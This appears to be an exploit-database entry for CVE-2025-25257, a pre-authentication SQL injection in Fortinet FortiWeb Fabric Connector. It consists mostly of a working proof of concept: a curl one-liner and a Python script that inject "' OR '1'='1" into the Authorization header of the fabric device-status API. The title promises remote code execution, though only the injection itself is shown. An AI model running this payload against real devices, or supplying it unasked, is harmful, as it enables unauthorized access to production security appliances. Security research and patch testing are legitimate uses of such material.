📄 FortiWeb Fabric Connector 7.6.x SQL Injection

# Exploit Title: FortiWeb Fabric Connector 7.6.x - Pre-authentication SQL
    Injection to Remote Code Execution
    # Date: 2025-10-05
    # Exploit Author: Milad Karimi (Ex3ptionaL)
    # Contact: [email protected]
    # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
    # Tested on: Win, Ubuntu
    # CVE : CVE-2025-25257
    
    Overview
    
    CVE-2025-25257 is a pre-authentication SQL Injection vulnerability in
    Fortinet FortiWeb Fabric Connector versions 7.0 through 7.6.x.
    This flaw allows attackers to inject malicious SQL commands into the
    vulnerable API endpoint, potentially leading to Remote Code Execution (RCE).
    
    
    PoC
    
    curl -k -H "Authorization: Bearer aaa' OR '1'='1" \
      https://<fortiweb-ip>/api/fabric/device/status
    
    PoC Python
    
    import requests
    
    def test_sqli(base_url):
        url = f"{base_url}/api/fabric/device/status"
        headers = {
            "Authorization": "Bearer aaa' OR '1'='1"
        }
        try:
            response = requests.get(url, headers=headers, verify=False,
    timeout=10)
            print(f"Status code: {response.status_code}")
            print("Response body:")
            print(response.text)
        except Exception as e:
            print(f"Error: {e}")
    
    if __name__ == "__main__":
        import argparse
        parser = argparse.ArgumentParser(description="PoC SQLi By Ex3ptionaL
    CVE-2025-25257 FortiWeb")
        parser.add_argument("base_url", help="Base URL of FortiWeb (ex:
    https://10.0.0.5)")
        args = parser.parse_args()
        test_sqli(args.base_url)
    # python3 src/poc.py https://10.0.0.5